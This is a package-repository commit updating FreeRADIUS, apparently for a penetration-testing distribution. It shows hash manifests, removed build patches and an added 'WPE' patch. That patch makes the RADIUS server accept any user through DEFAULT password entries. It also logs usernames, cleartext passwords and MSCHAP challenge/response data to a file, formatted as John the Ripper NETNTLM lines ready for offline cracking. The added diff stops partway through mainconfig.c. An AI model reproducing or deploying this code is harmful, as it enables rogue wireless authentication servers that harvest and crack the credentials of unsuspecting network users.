freeradius: wpe patch update, synced with gentoo, stable

Anton Bolshakov 2012-12-05 04:17:50 +00:00
parent 462f9db1ab
commit 2cb28c08f3
20 changed files with 609 additions and 3649 deletions


@ -1,30 +1,20 @@
AUX clients_wpe.conf 390 SHA256 ecc817541c5f49ef6a2ddaf87f5f87b760776375a4239aaa618d48b36e4c2497 SHA512 faf5c788187851cc74415fb790afd6cc753ceb3d9e7d838e022212e78d205ca5f7251389ee5aff5f40fa8141cd2a8dd2dc62fc9088a356fd7ed636923493151d WHIRLPOOL bb21e49aced897cea608d43ea9218ef0868c30150b330b7bd5c881ebf1473cce89ea5f5412b8dd8331ffb22cd4a4e562f5e639adf8bb7cc897273e53765cbeee
AUX eap_wpe.conf 5594 SHA256 2ab71bc501bf0f9b1e09e3a97db23c291672b3ae01f15beb4be2b71ceedc4111 SHA512 abd21acba79497803e00d4cad6cc7ff0ac643b70cad42ee6b7bc9a9f0a7a54e6eb958d5d723e3927af908c1d26c78d2d249ec349445a15f5a498e52e6f1ecf51 WHIRLPOOL 4c2a6d7b636e8df65f3c7f3abd623dd05ecd198278d640908b4b95ccc8aedd0d7a719409b73acd1893937a2da54082957643856b32c2e04d06e44ab347bec0f7
AUX freeradius-2.1.10-ipv6.patch 453 SHA256 15a227b1a9cb213763170e7f030bb30521af26ae1920a4acf51499a6628d492d SHA512 73c6ec69b830c9a9c58d93ef6d8764062938ef9757c4bb3063302b66ef456592f5e100acdfc302a0dc076d0c20eca63a176eabed1ba86ebc50be43db0dd9626d WHIRLPOOL 37bc461bb794d6f3b6be47805e46ee72e16f273455afc8b1fb0ec981b5914a787b48ec6773f728e8bcc08426dccf43855ef7f7447b72ba21b3efb24b8be7fde9
AUX freeradius-2.1.10-pkglibdir.patch 2551 SHA256 19e366a1eba9423185c5a7139f3affd0100a46ac94f5993f84a54cc77251bafc SHA512 4f2f813078aa6d08d0a576886cb5410d6152924c571726cfb965c87af880cbe52f9e8b7acc83ad78b00194c76ee444291d55a2c51a2e26c59336232b9e97f1e8 WHIRLPOOL 4c18d8530ac64ebfdc1ab70bc2bdc918d6692ac1b456890cd0727a312f2a65d7f49ac9ef07262b78cf1650078cfbd540034e1195566ca611c51d8879afbe53f6
AUX freeradius-2.1.10-qafixes.patch 56665 SHA256 10f8875ed0ca90b6075513030b9ce3cff62386c361ba7d494ca778f438fcf096 SHA512 1def6f12f31983ef5965a21e1fca5b1af2a111d2e956c3ae4a1ff4928499783c9b6fc51224e05450dd8d41a99609fcc72a9fa4a0490ba33b4ab989fd36de354d WHIRLPOOL 9b229750607a0c4bc2b011ebbdf0e2694d7c868f5fbf2bdb6ac0d4da25a0921d05b2a6a615ae5abce7a39dd57a3bf754fc22da697406e122ee77d3683d7e46f6
AUX freeradius-2.1.10-ssl.patch 582 SHA256 8ba257bea3504f1b800185af49ca0fe2a3f9bf65f0699c73e39f02e712467cef SHA512 b461158b05c404af87aa0c461e3d301780b9f5f1be935304258da51384d47024af0761ee14fe00c285f6586466484cee35c2d08089b0cef47b97bee58a66e6f0 WHIRLPOOL 82c759651b60bbfcec654404479e39494e33a297d0e76759564b2e15a6b5f51294be4e291f583765b319db27678b3912a76b0138ef70d23524bda255ddd23274
AUX freeradius-2.1.10-versionless-la-files.patch 2404 SHA256 8668376594966a6440df8a720560602ac290cedf45bce3b23d38b5a8a685c1db SHA512 c90a241c848974736fa0ab761741a47b53d0b518e2640ddbf6147834763e870b72e56fd8e40077de56074f7f925212e4b8a4eda33f0b1b5557b3d7e2217081ee WHIRLPOOL fc75bce59bde62c19cd196fcf814fb98df7fc10b3298a422e03e7aa071be2a0c9ab488ae1590b3ba33c5304951edf6445d9177602e7ba1025535ab8bb934aaf2
AUX freeradius-2.1.11-wpe.patch 13697 SHA256 f56257eea5b228c096e781f6aded15f969bc6f7079a53fb73538988593c20649 SHA512 9fc717eaa66ddd60f5454c13e38b949e9649dd1f83e702c9ed8efef54e9b1a5df7077a9ea3e7afa7d17a640336bf0e3f108f4b25a67402cfc534e5029337dba2 WHIRLPOOL 02d645ad864c9c1afc5d1a1d716fa34548ae92c8d24e88c19ecccb703c168f1438b897d7057eefa7f15cfc8bafd6196f144bcbccf65ceafe6d73c74a868e548a
AUX freeradius-2.1.12-pkglibdir.patch 2555 SHA256 e0b0444d2ecd30518ad00df3d8744ae64adf6bab640bae977b31e0220614b5dd SHA512 4c9681fd5f6f843eb01346b273b34896412b37d6fe7cc4e6e563ebc8e919369da0f753e52fc23ba50ba58e06ba4ef5b8bb351d478972526c377b8c7900d5105a WHIRLPOOL a42ddbac304429dc013bcf174fcd5cb9d16c181d72557ba0efaea2aee3af9023ce799c5c1d8d8c0c4cc0d19bb39c03c2fb9e38d5fa00c6d881183127dc50dd2c
AUX freeradius-2.1.12-qafixes.patch 3716 SHA256 f50a79b94f87a06330c95a77018e32e3ddff290d3b56a1260a637d8283476580 SHA512 76130b3afcd5e11492e04f60a1e8a5a4f5cc37f594640b36194b48eb6a514cfd3d142a6f67eb171ff69a9e02ada877f5fe0302f589724a3bdd5e04bec8fbbb9c WHIRLPOOL 4d5352d88e262acd7ab17c06b75aaafbc00a24eab4b51fdfad735c0d17bb818cd74dbffa26289965ec0ebe69cefc7d269516575995cf1dc6f236cf53ed5f485a
AUX freeradius-2.1.12-ssl.patch 583 SHA256 e7a348ad24de18f5299c2d0544d6a8ed25913a00955c2bdb108d763163b38fab SHA512 aed2dbe6207d23069910dbb330af560e61cc36bb7827552af8ec2560101255ac5ffbd9c2817e964024ea6a6517fd415fc5d3e9c4c0c12282dcdf4adfafdd8727 WHIRLPOOL 32bb834f4585769326a254642c2cad1b254e8659659889010407f26483bf747aafffd77a788556d5ad1678ff4c8ebf560cd9801ad8ce11c3f7c070bde984a930
AUX freeradius-2.1.12-versionless-la-files.patch 2408 SHA256 edf8a85096492b36e9c1c1e48aea733d5134c44c789621dce948c36227549e74 SHA512 e0b465985538f9a3de2b8254e0d8e177fa6a8d4b2e483b44618f9e0fbc03b068eb61638c00e22e6be22fda3e2b74212c9e7dde223b1621836b6bea2aa9a5c616 WHIRLPOOL e223943de35b9d8b068eb6c84b2832a04613a467bbcb0fa7925aa4adfe506cd3bc30fe0acc4b546be549d88468a1d8e8139b9b4d25a5c3e27de7202ca9eef3e6
AUX freeradius-2.1.7-nothreads.patch 514 SHA256 cad3e87971a5824d8f17fa462d7a9b0fe317261704eeebffdc404c4d41f2787a SHA512 3cc884e4469c5b9ddf551e915c1f009c17866f4647d8e090ba5928efcfae89031fbb6edde128c541faf4bc5e123847544974a514d3661d82514b91ee43729bed WHIRLPOOL 62dfb7003d87dfdc52aa92a35411e30b60877b406c5ec6975d5a74ba766635018cd1bc68892c5343bb839cce39bf68c3c26d5fc9a14d10b987edf344b351c8e7
AUX freeradius-2.1.7-pkglibdir.patch 2547 SHA256 bd7c15f0c66e80ed07bb98a731217c5260e30d628b7305849d57c907f860b1c1 SHA512 7e12d5d3d1b05cba21ce5efb82d51d9e9d66fc34410c2b1a551f03c2bcdb882be7f59d28ed98181817657f6243ca4a69224717b59fc5fcb80ffe808f458fb34c WHIRLPOOL a20b474b2e8a828dd50fd5133bac446a375046626453e201e3b45c28dfc558695fc92d2ef184c8b34cc3285ecc81dc3c4483ab915c25754a8965df3c3a8289c5
AUX freeradius-2.1.7-qafixes.patch 3686 SHA256 f0b3fc440636eeb33cc42a36d3ff344c816db55a8295bdbe816d00d4214eb1ec SHA512 5111fae1db42eb635ecdf7d4692b1295de37462a917b29d82914376df0cbeee320ba190b90bdd5585227717b2225d42bbf88dbe922ea97a207d6fcca51f7c910 WHIRLPOOL 67dc28916afc994259e6a817ce1e7ede58a7e212c08ebecfdd86fb345d77568531827f61a876979cc707138a7b323d5bcb2ffb85a5b49fd173fc8e3a028dfc84
AUX freeradius-2.1.7-ssl.patch 577 SHA256 a7a3ed31fd470c23035f79a5b6252e163dde430a5d9dbcad5cf75bbd34b78672 SHA512 1e08950d504fa04d89c640f453da43c74072c55fb46d94e618a3afa05437051a44c8a17bc6f7e6d9a435f6a7a54727507292526cbf8ef33c40297808e4ca4a04 WHIRLPOOL 2dd491dbee00e38eac55a846c10572fecda25e0e700f515d20d7f6cb9581f5f1e1d26243af711fe37f2b850937b666ab26e1ca4c3ff636ae0edb2a9a01a3bda8
AUX freeradius-2.1.7-versionless-la-files.patch 1747 SHA256 4e60188f1a2cd63b6dc775dbc8d09afd93e94b43431f7a930fed86399dd4883b SHA512 1be152682c6617a7683c8f3a016160f35de45aa116280b508f7f6c40b33c96d2480a3d7eda01b1a96d7d8781804c6ebd05d594be8831fd65f3b90d5f780452b3 WHIRLPOOL 934d1da163a87139e1a6b17ca57370114408efe1b59f1801acf32eb29f145fa509c031e38753f32aabe4b68412d51384abcb9cb5cbd502820b6d11283b239e85
AUX freeradius-2.1.7-wpe.patch 32096 SHA256 34ae76dd578ce3a497e93a7479336b2ce6eeb13be204590b8015e060bed3ef8c SHA512 82e80802beaf1021cb74b1f20d4b8c888398794a6acb8c879236ea58dff55a6df405446a3822bb81b3a1950641d795ad2c7f65d0fb72647d47c74010e8b69232 WHIRLPOOL b44a07e1a3cef83cf62dd27dc408d40de0d50ea96e7f1ed12e2d8d65e2d453eb3f42461711e7a7959e9b132eb058390bd7eb8fa22cc31f0fc0ff67bcc0ab4616
AUX freeradius-CVE-2012-3547.patch 591 SHA256 43a9ecfe1b536dd2d0a05460d42ca3d29e200e2413a4d36c96940e051f751014 SHA512 90c4d423f359eccc13d1054040eaacead56bf5ba5d8236c9523d5d97276243b00d39806c9c8386af12409fa5893d502a3b3d3e3d47bb6e334dce0ad0e3d24d79 WHIRLPOOL 921232d374f400671f27bc915a75f6de961692778dac645fb026643620773369b81a9a4f2a5f381b239d5c40e29dac5f5212d6d614b4419b17c17a3331bc3fc7
AUX freeradius-2.1.12-wpe.patch 14500 SHA256 0d0f8e7ac76b0e17603d677bb94588a07111f778809ef66583423c5d0852167f SHA512 5c5a6839eed1004d436c9d42a7a3a595e86e4832bbe952e8001d6dd5686b2ed311484f845841c18e7dd258c611b5ada1a11816516ad1fa8ab51d1231d12586e3 WHIRLPOOL 76bb59224b705994249874029cf0709334aac05054a4898af026e341002aff17745072c832e3b6363d278db210b0addfa7bf4fdb59ad99f00772790703929817
AUX radius.conf 129 SHA256 2d5b3e1af1299373182f2c8021bdf45c29db5d82b0a077b965a16ded32cb6292 SHA512 e248159c0a44f722e405c51c8015d9ad672e42ad0d38ca28f8a051ff911aa4d3e630b9bd4543e9d610940bc4ae50c022594e219ce341b36abe85c572acad418b WHIRLPOOL c409c0a928e01045f1a60aab7e24ba2ef1645a94ac120cddc6a05b39b0b2dd0e79e50bb40d68ff9ec31aa8d1173c4f2d6f626376eda7d07fc47fc491d8f2bbcf
AUX radius.conf-r3 345 SHA256 992331df42b77fe2b38fc6d715cfe0bc8d0d874fdcbbd510c9c99c85a77e6285 SHA512 353cb99bdb1c055b1590d34a4e148852de2b46f0c6292c88d1aad8c69eaaee6006e249eca79cd28dcd7690721f2ab65524f39c9015e714b10c439d343b7bf307 WHIRLPOOL 2f947c9728c7134cd8068933dd1784bfd1c39f15fa1d76f6e1c0d38087093399fe53a2a4e17b81413eb497f162ed69f19cd44129f34baa19ca2a347eaef6f9d9
AUX radius.init-r1 1575 SHA256 5f20b72e4b627442313818cbe3c31cadfdc747fad18cacdafe58de62812eea41 SHA512 25c9cec70befd126bc5d324e802ecdf2ad940478edab55cb4384f0392690cade2fa2735c1eb18d990616c3d506b470c9007292192baf7a11ffe67b79c2e6df3b WHIRLPOOL 62e0b177a62b5248494f39baedd7ed65b6b8c10d2b872bd11a0c075b8d55069e890e4c92816b8fb6a4f6abc1234eea3235f1cb4a465ad59099f6f9fdd799a0d3
AUX radius.init-r2 1358 SHA256 8a3d7d571985aef8c16c19a8b57bb7e1e2c7cf5dcfb24da421ce4bd241c5a001 SHA512 21265b729f1080a59805ac186280a4ad2cc2a26d56636b1969197ebbdf0a0fd471da31805ca9ce1e18693e90522a610ff95ec743a39f3a2b73e33ac3ee19a0da WHIRLPOOL 1b6fc4b3d55f6e69c04ea837510737e98744165f516b3bd582ee598221988dd8704e8f66781c9fa9c46d18cbb69b1c89afc79f2b48e047fb07fa592c8419c0c1
AUX radius.init-r3 766 SHA256 de9ec9dffa5eaccd40668ea85fff5c655000539582d1e78c96069b0cd071c813 SHA512 4f0257eadf642041b2dd762c8e175be82e2844362ebe0806cc9c78b074143ef1cd5dea2b644241f7b5b88a7d80e860720d39dd6d428d9c8de756ca071a1ca2fb WHIRLPOOL 42782b5912d3374dac703e9cbb37361eb4e737a6cb33121a249811c4955954f5e8523da1ac6ffcac4bd0cc90585056c47a9b2a5dde7ca1dcea21fb8e6fe506df
AUX users_wpe 99 SHA256 922a318e7f66b3b52b4a1cc53d765ff116567f010d9ce4784b4ae009fe97ca73 SHA512 8d533b6a4d3a2622ae5f2d768946840ddd49001cc0d34cb571da6123232d1987abcd3cb39a05e0ac20e680b7d9b910586532c39a9ef1af677bade856d2201fe0 WHIRLPOOL 2c2b1c27c7a8407c264425756ea386d56f8be647993ec86e26f892c97b87b7c4770651c4aa7032cfd6834d34d9f5ca708affb759d3e9e671b4a4e0f679448c64
DIST freeradius-server-2.1.11.tar.gz 4219356 SHA256 274ef96aa528d8b759f2fa06f2ba49ecbe1612e99fdedbb7016b557804b16b85
DIST freeradius-2.2.0-patches-4.tar.xz 3140 SHA256 9fd7b6f7e1501d63a073e6279b20eb6d8154e7898d81c85a5c548543ab33c1af SHA512 38ebd65d9ad8ce8f513f2f5c7fd9ff43b81cf468038a49f9eb7f4a54d13783e88866c3031e7abc0fc8b65d2aec4f347efa358b9e7e2aadb2d15567ce7e125d1d WHIRLPOOL a532444f6bfebe260a6b4bf43157fa1624ce9920a86635172ac94e0f757263904bac6ca6a472e12df73e32a8d25d6f7b094272bd743d13c566f23bfcbff6df27
DIST freeradius-server-2.1.12.tar.gz 4257106 SHA256 e597567c81ddbee385df8f076162c868ee6db5bf446c45ace94078c0c7d53805 SHA512 543ca20faa5ab2c45d7e0c9627c2860ac6eb2d1e3e920beffad612bb4a50a3ae65fe8f20a385541bca75ba05575091168de22c9c245f6869ecd5c862e6686189 WHIRLPOOL 88b8584fc8f27cfca99ec4a51ac77b653d0fa258aa80ccdd5d928893ec7a43c9c3db6a4e4716cc16d8da7dbbae64272862adba8ba3ba0558f1819996db42e5be
DIST freeradius-server-2.2.0.tar.gz 4289865 SHA256 ac22eefe7bd7c1c2b4de28613e628fd3e9ccae08a00a103e5f75aac0927bf009 SHA512 8652d27a292c3a8627c13b0bf12b829d3f2c50d82ed85eb342d1ec5c84ceabf8963907d50464a5907d2934f1b069a491411b1d5129efaaecefe4a30251b2b607 WHIRLPOOL 9f7dc926da7a33bfb425cb668bc9cf940a7a2dafa2a73ba8847a15f0d725476fdb4afc41963426ade9175709007f6f72892c3e9cd33d82c6601f57b873f92471
EBUILD freeradius-2.1.11-r1.ebuild 4821 SHA256 24df33d5700ce135f6392aef7e2182ae70ea8753cb22834affdace0d4d226b84 SHA512 4336a20ada2194bb76cfa28ae94122b920739ba0650e0143b49020545971a3e22236b9b0cc07d8938282d31d059de40daf64dab28f6870222fb44cdec5d1fcc4 WHIRLPOOL 4123b6548e91c1ecf452072e9883b1efbd9b5fcd404748d09c5bacf51e9bae9f5b2b9b4eeb2d1657a25c292c5af3594c6d0ee521e1109158133b3e87dbc20e90
EBUILD freeradius-2.1.12-r1.ebuild 5010 SHA256 8403de3b937bf12436018207aee10d8004590c6aa5ccdcb01ae1297b17a10161 SHA512 042a2b6226fcc5a18be6dd51f36b0a530393769edb33c4290dcbc267730e418518c8d9c73d45b1f2db52b3a65c12361bb60f3a0b9f98ceb1e054e20c26f646e7 WHIRLPOOL 4f374cab928bc51fb319c319f63c6278d9d0cea0a320a57ca5eef260550da0a6651a9c99ef5471bf04f90b01d03228251769470e87bcb791e21587487ead5da6
EBUILD freeradius-2.1.12.ebuild 4962 SHA256 4abb54a259e598782061354bdbd30289f20cb0a52d4748943e435052a8d65302 SHA512 c226f3956214b4b910afac46fc5276166681d7861b2a194bc51fb21f7fb9870666f70bbd602513720a0f27cc0de474235701516763e3d816cc5a5a1cb40cb55f WHIRLPOOL 1fb59344c6b9fe6fed82be8703400f459bd56220bf78174492078fa150ca217cb6899f35703c91de302f60ab9bea173af10180c59b39392abe7ef7374301ab9d
EBUILD freeradius-2.2.0-r1.ebuild 5419 SHA256 49a42d632e3aff5e722a347ff9213ffde4e6b42bd94435ab6219d23eb001b17f SHA512 c012b7a9820106c913af222c8ff929da85c563b5ceb050c8bcfd03a316fb32f0955d3a7753172e2589b5d96f0df93c60feb41c3bb8dae8aa0a337132ba953151 WHIRLPOOL 71381cd43a20eb01224638a513348e821dc7fe2ee487d14711fceb7c3ae7aec61d6bfd08fc4931ab8a1e353d4e9e4ba5609b4b86fc8c85d8f19bc6ad1d00aa25
EBUILD freeradius-2.2.0.ebuild 5016 SHA256 f00c09d7a97504f40836ac225f399d7ccb550a0a4c7ec8d56d2ca520e101f2b6 SHA512 bf2893460db3676ec12f2405544bf6fc68f488df73ac2d7a7bc31c802bf367a86579cfc4632befa5597600dbe4a1dad2333b24b661babe9e6faa6abae695fd91 WHIRLPOOL c87907ce9cc0df6e6105cfea5f60c9407f78c198325616f3a43042cdb9cfdc1c24725103b3e61499fc3e7032f13a53dc9bfdc91dbca542547f4a7231e89c3047


@ -1,12 +0,0 @@
diff -aur freeradius-server-2.1.10.orig/src/lib/udpfromto.c freeradius-server-2.1.10/src/lib/udpfromto.c
--- freeradius-server-2.1.10.orig/src/lib/udpfromto.c 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/udpfromto.c 2011-02-09 22:41:46.000000000 +0100
@@ -87,7 +87,7 @@
* This should actually be standard IPv6
*/
proto = IPPROTO_IPV6;
- flag = IPV6_PKTINFO;
+ flag = IPV6_2292PKTINFO;
#endif
#endif
} else {


@ -1,61 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/Make.inc.in freeradius-server-2.1.10/Make.inc.in
--- freeradius-server-2.1.10.orig/Make.inc.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/Make.inc.in 2011-02-09 17:51:46.000000000 +0100
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Naur freeradius-server-2.1.10.orig/raddb/radiusd.conf.in freeradius-server-2.1.10/raddb/radiusd.conf.in
--- freeradius-server-2.1.10.orig/raddb/radiusd.conf.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/raddb/radiusd.conf.in 2011-02-09 17:51:57.000000000 +0100
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Naur freeradius-server-2.1.10.orig/src/modules/Makefile freeradius-server-2.1.10/src/modules/Makefile
--- freeradius-server-2.1.10.orig/src/modules/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/Makefile 2011-02-09 17:52:11.000000000 +0100
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2011-02-09 17:50:58.000000000 +0100
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:52:53.000000000 +0100
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,11 +164,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi


@ -1,11 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:41:44.000000000 +0100
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h


@ -1,40 +0,0 @@
diff -Naur freeradius-server-2.1.10.orig/src/lib/Makefile freeradius-server-2.1.10/src/lib/Makefile
--- freeradius-server-2.1.10.orig/src/lib/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/Makefile 2011-02-09 17:39:25.000000000 +0100
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:40:00.000000000 +0100
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak 2011-02-09 17:40:17.000000000 +0100
@@ -147,6 +147,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:39:43.000000000 +0100
@@ -171,6 +171,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi


@ -0,0 +1,376 @@
diff -uNr freeradius-server-2.1.12/raddb/radiusd.conf.in freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.1.12/raddb/radiusd.conf.in 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in 2012-08-15 10:34:20.369565898 -0400
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.12/raddb/users freeradius-server-2.1.12-wpe/raddb/users
--- freeradius-server-2.1.12/raddb/users 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/users 2012-08-15 10:34:20.369565898 -0400
@@ -201,3 +201,6 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -uNr freeradius-server-2.1.12/src/include/radiusd.h freeradius-server-2.1.12-wpe/src/include/radiusd.h
--- freeradius-server-2.1.12/src/include/radiusd.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/include/radiusd.h 2012-08-15 10:34:20.369565898 -0400
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.12/src/main/auth.c freeradius-server-2.1.12-wpe/src/main/auth.c
--- freeradius-server-2.1.12/src/main/auth.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/auth.c 2012-08-15 10:34:20.369565898 -0400
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.12/src/main/log.c freeradius-server-2.1.12-wpe/src/main/log.c
--- freeradius-server-2.1.12/src/main/log.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/log.c 2012-08-15 10:34:20.369565898 -0400
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,68 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.12/src/main/mainconfig.c freeradius-server-2.1.12-wpe/src/main/mainconfig.c
--- freeradius-server-2.1.12/src/main/mainconfig.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/mainconfig.c 2012-08-15 10:34:20.369565898 -0400
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
